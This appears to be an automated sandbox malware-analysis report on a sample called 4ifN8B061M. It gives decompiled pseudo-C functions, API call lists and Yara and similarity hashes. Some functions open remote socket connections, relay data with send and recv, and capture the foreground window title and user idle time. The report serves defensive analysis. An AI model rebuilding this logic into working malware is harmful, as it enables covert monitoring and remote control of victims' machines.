                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CriticalDeleteSection
                                      • String ID: $x&
                                      • API String ID: 2166061224-4126032173
                                      • Opcode ID: c1cd06bbe0179ba2a0ca997f13cf48802157b4ebf8d092a2090b12d1e969bf82
                                      • Instruction ID: 19bf1e830860b75ba04d1ab0947cd5dab9d8bdbf1f0667c0bd84f038760e5ce8
                                      • Opcode Fuzzy Hash: c1cd06bbe0179ba2a0ca997f13cf48802157b4ebf8d092a2090b12d1e969bf82
                                      • Instruction Fuzzy Hash: 33D05E3432CB41CB97005FB1BC2C6293A9CBB447CE3008054FC1AD33A0EBB0CD688A68
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025B4FE, Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E0025B4FE(signed int* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t23;
				void* _t33;
				struct _CRITICAL_SECTION* _t43;
				signed int* _t59;
				intOrPtr _t62;
				void* _t66;

				_t45 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				_t43 = __ecx + 0x3d8;
				EnterCriticalSection(_t43);
				_t67 = _t59[0x7b];
				_t62 = _a4;
				if(_t59[0x7b] != 0) {
					L2:
					_t69 = _t59[3];
					if(_t59[3] != 0) {
						L5:
						_t63 =  &(_t59[0xf1]);
						_t22 = E002520B4( &(_t59[0xf1]), 0);
						__eflags = _t22;
						if(_t22 == 0) {
							E00251E9A(_t63);
						}
						_t23 = E002520B4( &(_t59[0xf3]), 0);
						__eflags = _t23;
						if(_t23 == 0) {
							E00251E9A( &(_t59[0xf3]));
						}
						_v12 = _t59[4];
						_v8 = _t59[0x7c];
						E00251E6F(_t63, E0025B424,  &_v12);
						E00251E6F( &(_t59[0xf3]), E0025B491,  &_v12);
						 *_t59 = 1;
						LeaveCriticalSection(_t43);
						E002520B4( &(_t59[0xf1]), 0xffffffff);
						E002520B4( &(_t59[0xf3]), 0xffffffff);
						EnterCriticalSection(_t43);
						 *_t59 =  *_t59 & 0x00000000;
						LeaveCriticalSection(_t43);
						E0025B6A9(_t59);
						_t33 = 0;
						__eflags = 0;
					} else {
						E00253222(_t66, _t62);
						if(E0025538F( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
							goto L5;
						} else {
							goto L4;
						}
					}
				} else {
					E00253222(_t66, _t62 + 8);
					if(E0025538F( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
						L4:
						LeaveCriticalSection(_t43);
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}












                                      0x0025b4fe
                                      0x0025b501
                                      0x0025b502
                                      0x0025b506
                                      0x0025b508
                                      0x0025b50f
                                      0x0025b515
                                      0x0025b51c
                                      0x0025b51f
                                      0x0025b53f
                                      0x0025b53f
                                      0x0025b543
                                      0x0025b56c
                                      0x0025b56c
                                      0x0025b576
                                      0x0025b57b
                                      0x0025b57d
                                      0x0025b581
                                      0x0025b581
                                      0x0025b58e
                                      0x0025b593
                                      0x0025b595
                                      0x0025b59d
                                      0x0025b59d
                                      0x0025b5a7
                                      0x0025b5b0
                                      0x0025b5bc
                                      0x0025b5d0
                                      0x0025b5dc
                                      0x0025b5e2
                                      0x0025b5ec
                                      0x0025b5f9
                                      0x0025b5ff
                                      0x0025b605
                                      0x0025b609
                                      0x0025b60d
                                      0x0025b612
                                      0x0025b612
                                      0x0025b545
                                      0x0025b54c
                                      0x0025b55b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0025b55b
                                      0x0025b521
                                      0x0025b52b
                                      0x0025b53d
                                      0x0025b55d
                                      0x0025b55e
                                      0x0025b566
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0025b53d
                                      0x0025b618

                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 0025B50F
                                      • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0025B55E
                                        • Part of subcall function 00253222: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00252939,?,?,00000000,exit,00000000,start), ref: 00253247
                                        • Part of subcall function 0025538F: getaddrinfo.WS2_32(?,00000000,00254AC8,00000000), ref: 002553DC
                                        • Part of subcall function 0025538F: socket.WS2_32(00000002,00000001,00000000), ref: 002553F3
                                        • Part of subcall function 0025538F: htons.WS2_32(?), ref: 00255419
                                        • Part of subcall function 0025538F: freeaddrinfo.WS2_32(00000000), ref: 00255429
                                        • Part of subcall function 0025538F: connect.WS2_32(?,?,00000010), ref: 00255435
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0025B5E2
                                      • EnterCriticalSection.KERNEL32(?), ref: 0025B5FF
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0025B609
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                      • String ID:
                                      • API String ID: 4195813003-0
                                      • Opcode ID: 958935bb4ee6d893d26ee9992113204de0ae813d447176d1c4075fa7b2e9bb80
                                      • Instruction ID: e60a567895e541e4c5ba51cbb40e8194bbd8da230b7e11e185e09c564453c77b
                                      • Opcode Fuzzy Hash: 958935bb4ee6d893d26ee9992113204de0ae813d447176d1c4075fa7b2e9bb80
                                      • Instruction Fuzzy Hash: C5318671220502BBD719EB60DC52FAEB79CBF15352F404115FD1A920D2EB74AA2CCF98
                                      Uniqueness

                                      Uniqueness Score: 0.14%

                                      Function 012E999A, Relevance: 6.1, APIs: 4, Instructions: 99COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(012E6F6D,00000000,?,?,00000000,00000000,012E6F6D,?,00000000,00000000,012E6F6D,00000001,?,?,00000001,012E6F6D), ref: 012E99E2
                                      • MultiByteToWideChar.KERNEL32(012E6F6D,00000001,?,?,00000000,?), ref: 012E9A57
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,012E5CCD), ref: 012E9A69
                                      • __freea.LIBCMT ref: 012E9A72
                                        • Part of subcall function 012E6EDF: HeapAlloc.KERNEL32(00000000,?,?,?,012E852B,00001000,?,?,?,?,012E3843), ref: 012E6F11
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                      • String ID:
                                      • API String ID: 573072132-0
                                      • Opcode ID: ab2953d1b1f43f96550d41685f93d704f991733c424c91fb6413bd8629be0c01
                                      • Instruction ID: ca648706137bee7b908ac1b7593ef61a0ef51a4e461d7f523180d6a8aa5bf91e
                                      • Opcode Fuzzy Hash: ab2953d1b1f43f96550d41685f93d704f991733c424c91fb6413bd8629be0c01
                                      • Instruction Fuzzy Hash: A531BE7292021BABDF21DF68DC48DFF7BE9EF44314F44412AEA15A7240D7318991CBA0
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0025D68F, Relevance: 6.1, APIs: 4, Instructions: 54libraryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025D68F(WCHAR** __ecx, intOrPtr* __edx) {
				struct HRSRC__* _t13;
				void* _t14;
				unsigned int _t32;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;

				_t35 = __edx;
				_t36 = LoadLibraryExW( *__ecx, 0, 2);
				if(_t36 == 0xffffffff) {
					L4:
					return 0;
				}
				_t13 = FindResourceW(_t36, 1, 0x10);
				if(_t13 == 0) {
					goto L4;
				}
				_t14 = LoadResource(_t36, _t13);
				if(_t14 == 0) {
					goto L4;
				}
				_t32 =  *(_t14 + 0x28);
				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
				 *(_t35 + 8) = _t32 & 1;
				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
				FreeLibrary(_t36);
				return 1;
			}








                                      0x0025d698
                                      0x0025d6a0
                                      0x0025d6a5
                                      0x0025d709
                                      0x00000000
                                      0x0025d709
                                      0x0025d6ae
                                      0x0025d6b6
                                      0x00000000
                                      0x00000000
                                      0x0025d6ba
                                      0x0025d6c2
                                      0x00000000
                                      0x00000000
                                      0x0025d6c7
                                      0x0025d6ca
                                      0x0025d6d0
                                      0x0025d6dc
                                      0x0025d6e0
                                      0x0025d6f5
                                      0x0025d6f9
                                      0x0025d6fc
                                      0x0025d6ff
                                      0x00000000

                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0025C02B), ref: 0025D69A
                                      • FindResourceW.KERNEL32(00000000,00000001,00000010), ref: 0025D6AE
                                      • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0025C02B), ref: 0025D6BA
                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0025C02B), ref: 0025D6FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoadResource$FindFree
                                      • String ID:
                                      • API String ID: 3272429154-0
                                      • Opcode ID: 851a386352c910dbf68a1a4374aca4cafa0aecacd95dcfc7508d4449014b9109
                                      • Instruction ID: e777c131721c427d75e7756ecd25cc73cd21e1109c3fea352c7499c212ce7de6
                                      • Opcode Fuzzy Hash: 851a386352c910dbf68a1a4374aca4cafa0aecacd95dcfc7508d4449014b9109
                                      • Instruction Fuzzy Hash: D701C0B5310A02EFD3188F25AC89A66B7A4FF49311705C239E929C33E0D7B0D865CBA4
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0025D2BD, Relevance: 6.1, APIs: 4, Instructions: 53networksleepCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 25%
                                      			E0025D2BD(void* __ecx, void* __edx) {
				signed int _v8;
				char _v2056;
				signed int* _t9;
				signed int _t15;
				char* _t16;
				void* _t17;
				void* _t22;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t9 =  &_v8;
				_t23 = __ecx;
				_t22 = __edx;
				__imp__#10(__ecx, 0x4004667f, _t9);
				if(_t9 == 0xffffffff) {
					L4:
					return 0;
				}
				if(_v8 == 0) {
					Sleep(1);
					L7:
					return 1;
				}
				E00251052( &_v2056, 0, 0x800);
				_t15 =  &_v2056;
				__imp__#16(_t23, _t15, 0x800, 0, _t17);
				_v8 = _t15;
				if(_t15 == 0) {
					goto L4;
				}
				_t16 =  &_v2056;
				__imp__#19(_t22, _t16, _t15, 0);
				if(_t16 > 0) {
					goto L7;
				}
				goto L4;
			}











                                      0x0025d2c6
                                      0x0025d2ca
                                      0x0025d2d0
                                      0x0025d2d2
                                      0x0025d2da
                                      0x0025d2e3
                                      0x0025d331
                                      0x00000000
                                      0x0025d331
                                      0x0025d2e9
                                      0x0025d339
                                      0x0025d33f
                                      0x00000000
                                      0x0025d341
                                      0x0025d2fb
                                      0x0025d303
                                      0x0025d30e
                                      0x0025d314
                                      0x0025d31a
                                      0x00000000
                                      0x00000000
                                      0x0025d31f
                                      0x0025d327
                                      0x0025d32f
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • ioctlsocket.WS2_32(00000000,4004667F,00000000), ref: 0025D2DA
                                      • recv.WS2_32(00000000,?,00000800,00000000), ref: 0025D30E
                                      • send.WS2_32(00000000,?,00000000,00000000), ref: 0025D327
                                      • Sleep.KERNEL32(00000001), ref: 0025D339
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleepioctlsocketrecvsend
                                      • String ID:
                                      • API String ID: 1168213214-0
                                      • Opcode ID: f3742491aff4569e95a91511fb39cd1d4919c60cb62c5ec7f22b47aac3669b82
                                      • Instruction ID: 98e1e943d682e15abfc9996520c6aa73a3d6c08b6bac61183e522df212a4cc54
                                      • Opcode Fuzzy Hash: f3742491aff4569e95a91511fb39cd1d4919c60cb62c5ec7f22b47aac3669b82
                                      • Instruction Fuzzy Hash: 3E0188B1561515FBE7209B659D49FEE36BCEB44312F1480A1FA45D10C0EBB48E1CCBA5
                                      Uniqueness

                                      Uniqueness Score: 7.75%

                                      Function 0025444A, Relevance: 6.0, APIs: 4, Instructions: 46UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E0025444A(intOrPtr _a4) {
				char _v8;
				struct tagLASTINPUTINFO _v16;
				signed int _v36;
				char _v40;
				short _v552;

				_v16.cbSize = 8;
				GetLastInputInfo( &_v16);
				_t23 = GetTickCount() - _v16.dwTime;
				GetWindowTextW(GetForegroundWindow(),  &_v552, 0x100);
				E00253412( &_v8,  &_v552);
				_t12 =  &_v36;
				_v36 = _v36 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v40 = 0x15;
				asm("movups [ebp-0x1c], xmm0");
				E002534A6(E0025358E(E0025356D( &_v40, (GetTickCount() - _v16.dwTime) / 0x3e8), _t23 % 0x3e8,  &_v8),  *_t12, _a4);
				E00253492( &_v40);
				E00255A2D(_v8);
				return _a4;
			}








                                      0x00254457
                                      0x0025445f
                                      0x0025446b
                                      0x0025448c
                                      0x0025449c
                                      0x002544a4
                                      0x002544a4
                                      0x002544ac
                                      0x002544af
                                      0x002544ba
                                      0x002544cc
                                      0x002544d4
                                      0x002544dc
                                      0x002544e6

                                      APIs
                                      • GetLastInputInfo.USER32(?), ref: 0025445F
                                      • GetTickCount.KERNEL32 ref: 00254465
                                      • GetForegroundWindow.USER32 ref: 00254479
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0025448C
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
                                      • String ID:
                                      • API String ID: 2567647128-0
                                      • Opcode ID: 6372ac9cd25fb4f32bdb4b6933ff297ee0f34e815f107b76389bfbb737552729
                                      • Instruction ID: aae9be66a5b30ff9feefb2f8572cf0f762e661f9aa3cee13b410408bc7eead20
                                      • Opcode Fuzzy Hash: 6372ac9cd25fb4f32bdb4b6933ff297ee0f34e815f107b76389bfbb737552729
                                      • Instruction Fuzzy Hash: 87115E71D10108EBCB04EBA0ED5DADDB7B9EF48301F009165E906B6091EF74AB58CF54
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025FC79, Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 87%
                                      			E0025FC79(CHAR* __ecx, long* __edx) {
				long _v8;
				long _t6;
				void* _t11;
				long* _t18;
				void* _t22;

				_push(__ecx);
				_t18 = __edx;
				_t11 = E002510AD(0x400000);
				_v8 = 0;
				_t22 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0);
				_t6 = GetFileSize(_t22, 0);
				 *_t18 = _t6;
				ReadFile(_t22, _t11, _t6,  &_v8, 0);
				CloseHandle(_t22);
				return _t11;
			}








                                      0x0025fc7c
                                      0x0025fc85
                                      0x0025fc8f
                                      0x0025fca3
                                      0x0025fcac
                                      0x0025fcb1
                                      0x0025fcbc
                                      0x0025fcc2
                                      0x0025fcc9
                                      0x0025fcd5

                                      APIs
                                        • Part of subcall function 002510AD: GetProcessHeap.KERNEL32(00000000,00000000,0025F750,00000800,00000000,00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000), ref: 002510B3
                                        • Part of subcall function 002510AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 002510BA
                                      • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0025FCA6
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,00252B6F), ref: 0025FCB1
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0025FCC2
                                      • CloseHandle.KERNEL32(00000000), ref: 0025FCC9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Heap$AllocCloseCreateHandleProcessReadSize
                                      • String ID:
                                      • API String ID: 1280141731-0
                                      • Opcode ID: dcdf8357ab2a9b95098a2d9abacda7cb96f6c0917a7ec32b0279d0861310b2d8
                                      • Instruction ID: ae157a48078182ca5722e947787b7fc833391a46a28e9298930cd14890f45de5
                                      • Opcode Fuzzy Hash: dcdf8357ab2a9b95098a2d9abacda7cb96f6c0917a7ec32b0279d0861310b2d8
                                      • Instruction Fuzzy Hash: DCF05EB2611610BFF3145B64AC0DFBB36ACEB55650F104025FA01E21C0EAF05E0986B4
                                      Uniqueness

                                      Uniqueness Score: 0.18%

                                      Function 0025CCBA, Relevance: 6.0, APIs: 4, Instructions: 35threadsynchronizationCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025CCBA(void* __ecx) {
				void* _t14;
				long _t15;
				void** _t26;
				void* _t27;

				_t27 = __ecx;
				_t1 = _t27 + 0x14; // 0x266564
				_t26 = _t1;
				if( *_t26 == 0) {
					L6:
					_t5 = _t27 + 0x10; // 0x266560
					E0025CEBD(_t5);
					_t6 = _t27 + 4; // 0x266554
					E0025CEBD(_t6);
					_t7 = _t27 + 0xc; // 0x26655c
					E0025CEBD(_t7);
					_t8 = _t27 + 8; // 0x266558
					_t14 = E0025CEBD(_t8);
					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
					return _t14;
				}
				_t15 = GetCurrentThreadId();
				_t2 = _t27 + 0x18; // 0x0
				if(_t15 ==  *_t2) {
					L5:
					E0025CEBD(_t26);
					goto L6;
				}
				if( *(_t27 + 0x10) == 0) {
					return _t15;
				}
				_t4 = _t27 + 0x10; // 0x0
				SetEvent( *_t4);
				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
					TerminateThread( *_t26, 0xfffffffe);
				}
				goto L5;
			}







                                      0x0025ccbb
                                      0x0025ccbe
                                      0x0025ccbe
                                      0x0025ccc4
                                      0x0025cd05
                                      0x0025cd05
                                      0x0025cd08
                                      0x0025cd0d
                                      0x0025cd10
                                      0x0025cd15
                                      0x0025cd18
                                      0x0025cd1d
                                      0x0025cd20
                                      0x0025cd25
                                      0x00000000
                                      0x0025cd25
                                      0x0025ccc6
                                      0x0025cccc
                                      0x0025cccf
                                      0x0025ccfe
                                      0x0025cd00
                                      0x00000000
                                      0x0025cd00
                                      0x0025ccd5
                                      0x0025cd2b
                                      0x0025cd2b
                                      0x0025ccd7
                                      0x0025ccda
                                      0x0025ccf2
                                      0x0025ccf8
                                      0x0025ccf8
                                      0x00000000

                                      APIs
                                      • GetCurrentThreadId.KERNEL32(?,00000000,0025292E,00000000,exit,00000000,start), ref: 0025CCC6
                                      • SetEvent.KERNEL32(00000000), ref: 0025CCDA
                                      • WaitForSingleObject.KERNEL32(00266564,00001388), ref: 0025CCE7
                                      • TerminateThread.KERNEL32(00266564,000000FE), ref: 0025CCF8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                      • String ID:
                                      • API String ID: 2174867186-0
                                      • Opcode ID: 2e11c9005bbd18f98fef32a10f9cc6dd06bd47105a3393eeb0d01a1cd6da276a
                                      • Instruction ID: 58d2d4d82039e3d4b7e4c55f4ac80dc1e14aed9623083496df6ad03cd2c4df61
                                      • Opcode Fuzzy Hash: 2e11c9005bbd18f98fef32a10f9cc6dd06bd47105a3393eeb0d01a1cd6da276a
                                      • Instruction Fuzzy Hash: 37011231010701DFD734AF14E84A6A977B2AF50313F604A2AE853514E5EB78696CCA44
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 012EE20F, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 012EE226
                                      • GetLastError.KERNEL32(?,012EDE49,00000000,00000001,00000000,00000000,?,012EAE2B,00000000,00000000,00000000,00000000,00000000,?,012EB3AA,012ED148), ref: 012EE232
                                        • Part of subcall function 012EE1F8: CloseHandle.KERNEL32(FFFFFFFE), ref: 012EE208
                                      • ___initconout.LIBCMT ref: 012EE242
                                        • Part of subcall function 012EE1BA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 012EE1CD
                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000), ref: 012EE257
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                      • String ID:
                                      • API String ID: 2744216297-0
                                      • Opcode ID: 4af3bb33e8e6ad2755fb524b03a542392ae39ac864394009ee25d9af0e707ebe
                                      • Instruction ID: 3b404fa4a1b8891bcd12387d267db2ad909e0ae4b04868b85e654aebed86d6c1
                                      • Opcode Fuzzy Hash: 4af3bb33e8e6ad2755fb524b03a542392ae39ac864394009ee25d9af0e707ebe
                                      • Instruction Fuzzy Hash: 51F01C36011219BFCF631F95EC1CA9A3FAAFF497A1F454411FA1885124C632C860EB91
                                      Uniqueness

                                      Uniqueness Score: 0.53%

                                      Function 012E59CB, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 012E59D4
                                        • Part of subcall function 012E628A: HeapFree.KERNEL32(00000000,00000000), ref: 012E62A0
                                        • Part of subcall function 012E628A: GetLastError.KERNEL32(?,?,012E98A8,?,00000000,?,00000000,?,012E98CF,?,00000007,?,?,012E9CD3,?,?), ref: 012E62B2
                                      • _free.LIBCMT ref: 012E59E7
                                      • _free.LIBCMT ref: 012E59F8
                                      • _free.LIBCMT ref: 012E5A09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
